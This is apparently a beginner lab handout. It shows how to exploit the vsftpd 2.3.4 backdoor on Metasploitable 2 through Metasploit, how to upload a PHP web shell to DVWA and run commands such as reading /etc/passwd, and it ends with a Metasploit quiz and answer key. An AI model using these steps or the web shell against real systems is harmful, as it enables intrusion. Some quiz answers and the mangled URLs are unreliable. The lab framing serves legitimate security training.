Beginner Metasploit

Assignment:
Simple Exploration Tasks
Objective:
Your task is to exploit a vulnerability in the target system (Metasploitable 2) using a
backdoor. Once successful, you will gain access to the system and perform basic
exploration tasks to demonstrate control over the system. Before exploitation,
perform a reconnaissance of the target system to gather information about the
services running on it.

Task 1: Perform Reconnaissance of the Target System

Before you exploit the system, you need to gather information about the services
running on the target. You’ll use basic reconnaissance techniques to identify any
vulnerabilities.

Scan the Target System:

Use tools like nmap to scan the target system (Metasploitable 2) for open ports and
running services.

Command:
nmap -sV 192.168.127.129

Explanation:
nmap -sV 192.168.127.129: This command scans the IP address 192.168.127.129
(replace with the IP of your Metasploitable 2 machine) and identifies the services
running on the open ports.

Expected Output: You will see a list of open ports and services running on the
system. For example:

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1

This shows that there is an FTP service running on port 21 with a vulnerable version
of vsftpd 2.3.4.

Task 2: Access the Target System

Exploit the Target System: Now that you've identified the vulnerable service, use a
Metasploit module to exploit the system and gain access via a backdoor.

Command:
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor

set RHOST 192.168.127.129

run

Explanation:
msfconsole: Starts the Metasploit framework.

use exploit/unix/ftp/vsftpd_234_backdoor: Selects the Metasploit module

that targets the vsftpd 2.3.4 backdoor vulnerability.

set RHOST 192.168.127.129: Sets the target machine’s IP address.

run: Executes the exploit.

Expected Output: Once the exploit runs successfully, you should see a message like
this:
Command shell session 1 opened (your-kali-ip:port ->
192.168.127.129:port)This indicates you've gained access to the target system.

Task 3: Check the Current User

Verify the User: Once you have access to the system, check which user you are
logged in as.

Command:
whoami

Explanation:
whoami: This command displays the current user logged into the system.
Expected Output: You should see root if the exploit worked successfully.

Example output:
root

Task 4: Create a Simple File to Show You Can Write to

the
System

Create a File: Create a simple text file with a message to show you have write access
to the system.

Command:echo "You have successfully exploited the system!" >

/root/exploit_success.txt
Explanation:

echo "You have successfully exploited the system!": Prints the specified
message.
> /root/exploit_success.txt: Writes the output into a file located at
/root/exploit_success.txt.

Check the Contents of the File: To confirm that the file was created and contains the
correct message, use the following command:
Command:
cat /root/exploit_success.txt

Explanation:
cat /root/exploit_success.txt: Displays the contents of the file you just created.

Expected Output: You should see the message:

You have successfully exploited the system!

Assignment: Hacking DVWA

by Uploading a Malicious File

What is DVWA and Why Are We Using

It?
DVWA stands for Damn Vulnerable Web Application.
It's a purposely weak website made for practice. You can use it to learn how hackers
attack websites without breaking the law.

We use DVWA because:

 It's safe — it runs in your local lab.

 It includes many common website flaws (like bad file uploads, SQL injection,
etc.).

 You get to learn how hackers break things so you can learn how to protect
them.
What’s the Goal of This Assignment?
You’ll learn:

 How to find if a website is running.

 How to upload a fake file (a web shell) that lets you control the server.
 How to run commands on the victim machine using just your browser.

Step 1: Check if the Target Has a

Website Running
What Are We Doing?

We’re using a tool called nmap to check if the victim computer has a website
running on port 80 (the normal port for websites).

✅ Command to Run in Terminal:

nmap -p 80 -sV 192.168.127.129

 -p 80: only check website port

 -sV: find what version the website server is using

✅ What You Should See:

80/tcp open http Apache httpd 2.2.8 (Ubuntu)

This means the website is working and using Apache as the server.
Open this in your browser:

http://192.168.127.129/dvwa

Step 2: Set Up DVWA for Hacking

What To Do:
 Open browser and go to:

http://192.168.127.129/dvwa

Login with:

 Username: admin
 Password: password
 On the left, click DVWA Security.
 Change Security Level to "Low" and click Submit.
This makes hacking easier for practice.
 Now click File Upload in the menu.

Step 3: Create a Fake PHP Script to

Upload (Web Shell)
We’ll make a small PHP file that lets you run commands on the target.

✅ Command to Make It:

echo "<?php system(\$_GET['cmd']); ?>" > shell.php

This creates a file called shell.php with code that:

 Runs any command you send in the browser (like ls, whoami, etc.)

✅ Check if It Worked:

cat shell.php

You should see:

<?php system($_GET['cmd']); ?>

Step 4: Upload That PHP File to the
DVWA Website

 Go back to File Upload in DVWA.

 Click Browse, pick your shell.php file.
 Click Upload.

✅ What You Should See:

../../hackable/uploads/shell.php successfully uploaded!

This means your file is now on the server and can be used.

⚔️Step 5: Use the PHP Web Shell to

Hack the Target
Now we use our browser to send commands to the server through our uploaded file.

✅ Example:

Open this in browser:

http://192.168.127.129/dvwa/hackable/uploads/shell.php?
cmd=whoami

What You Should See:

www-data

This shows you’re running commands on the target machine, as the website user.

Try These Other Commands Too

📌 What
You Want 🌐 Link to Use
to Do
See files in http://192.168.127.129/dvwa/hackable/uploads/
folder shell.php?cmd=ls
 📌 What
You Want 🌐 Link to Use
to Do
Check OS http://192.168.127.129/dvwa/hackable/uploads/
info shell.php?cmd=uname -a
Find your
http://192.168.127.129/dvwa/hackable/uploads/
location on
shell.php?cmd=pwd
server
See user http://192.168.127.129/dvwa/hackable/uploads/
accounts shell.php?cmd=cat /etc/passwd

Final Thoughts
You just:

 Found a running website

 Logged into DVWA
 Changed its settings to make hacking easy
 Uploaded a fake file that lets you control the server
 Ran commands on another machine from your browser!

1. Which command is used to start Metasploit?

a) msfconsole
b) start msfconsole
c) metasploit
d) launch msf

Answer: a) msfconsole

2. Which command is used to search for an exploit in

Metasploit?

a) search <exploit_name>
b) find <exploit_name>
c) locate <exploit_name>
d) search for <exploit_name>
Answer: a) search <exploit_name>

3. What does the command use do in Metasploit?

a) Starts an exploit
b) Loads an exploit module
c) Displays a list of available payloads
d) Scans for open ports

Answer: b) Loads an exploit module

4. What is the correct command to set a specific

option like the target IP address in Metasploit?

a) set RHOST <IP_address>

b) config RHOST <IP_address>
c) target <IP_address>
d) set TARGET <IP_address>

Answer: a) set RHOST <IP_address>

5. Which command in Metasploit is used to show the

current configuration options?

a) show settings
b) show options
c) display config
d) show config

Answer: b) show options

6. Which command is used to launch an exploit in

Metasploit?

a) run exploit
b) exploit
c) execute
d) start exploit

Answer: b) exploit
7. How can you check the payloads compatible with a
specific exploit in Metasploit?

a) show payloads
b) show compatible
c) list payloads
d) display payloads

Answer: a) show payloads

8. What command is used to interact with an active

session in Metasploit?

a) interact <session_number>
b) session -i <session_number>
c) session <session_number>
d) connect <session_number>

Answer: b) session -i <session_number>

9. Which command in Metasploit is used to display all

the available exploits?

a) show exploits
b) list exploits
c) search exploits
d) display all exploits

Answer: a) show exploits

10. Which command is used to exit Metasploit's

session?

a) quit
b) exit
c) close
d) end

Answer: b) exit